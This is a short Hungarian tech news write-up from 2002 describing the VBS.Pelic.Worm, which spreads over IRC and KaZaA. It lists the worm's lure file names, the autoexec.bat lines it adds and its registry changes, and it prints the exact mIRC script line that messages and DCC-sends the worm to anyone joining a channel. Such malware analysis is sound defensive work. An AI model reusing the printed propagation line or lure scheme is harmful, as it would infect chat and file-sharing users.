Dotkom
VBS.Pelic.Worm – IRC-n terjedő féregvírus
A Pelic nevű féreg IRC-csatornákon keresztül terjed, köszönhetően a mIRC Script.ini állományában végrehajtott változtatásoknak.
A féreg paraméterei
Felfedezésének ideje: 2002. október 1.
Védekezés elkészültének ideje: 2002. október 3.
Veszélyeztetett operációs rendszerek: Windows 9x/NT/2k/XP/Me
Nem érintett operációs rendszerek: Windows 3.x, Macintosh, Unix, Linux
Mérete: 7.915 byte
Fertőzések száma: 0-49
Földrajzi elterjedtsége: alacsony
Károkozás mértéke: alacsony
Eltávolítása: könnyű
Aktiválódása esetén lezajló események
– egy IRC-csatornához való csatlakozáskor a következő üzenetet jeleníti meg: hola , soy francisco , quieres tener todas las peliculas que quieras ver!
– ezek után létrehozza a C:/Windows/All_acces_videos.exe.vbs állományt
– bemásolja magát a következő helyekre:
C:/Windows/autoexec.bat.vbs
C:/Program Files/KaZaA/My Shared Folder/Sex-free.exe.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Windows-xp-full-edition.exe.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Shakira-sex-anal.jpg.vbs
C:/Program Files/KaZaA/My Shared Folder/Mix-brazil.mp3.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Porto-seguro.mp3.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Asereje.mp3.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Quake 2.exe.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Half-life_complete_version.zip.vbs
C:/Windows/Quake2.exe.vbs
C:/Windows/all_acces_videos.exe.vbs
C:/Windows/kazaa/all_acces_videos.exe.vbs
C:/Windows/kazaa/sex_all.exe.vbs
C:/Windows/kazaa/quake2_full_version.exe.vbs
– főbb antivírus programok után kutat és megkísérli letörölni, ha talál egyet
– módosítja az autoexec.bat file-t a következő két sor hozzáadásával:
@Start C:/windows/Quake2.exe.vbs>nul
cls
– a C, D, E meghajtón mIRC scriptek után keres, és ha talál akkor abban a következő változtatást végzi:
[script]
n0=on 1:JOIN:#:if ( $me != $nick ) { /msg $Nick hola , soy francisco , quieres tener todas las peliculas que quieras ver! | /dcc send $NICK C:/Windows/all_acces_videos.exe.vbs }
– létrehozza a HKEY_CURRENT_USER/software/Legion/sistem Registry kulcsot, illetve ebben az infected értéket
– amennyiben ez az érték be van állítva, a féreg felülírja a HTML, HTT, HTM állományokat saját kódjával
– a HKEY_CURRENT_USER/Software/Kazaa/LocalContent/DisableSharing Registry kulcsot is megváltoztatja, mégpedig 00000000-ra
[fbcomments url="https://www.technokrata.hu/egazdasag/dotkom/2002/10/04/vbs-pelic-worm-irc-n-terjedo-feregvirus/" width="800" count="off" num="3" countmsg=""]
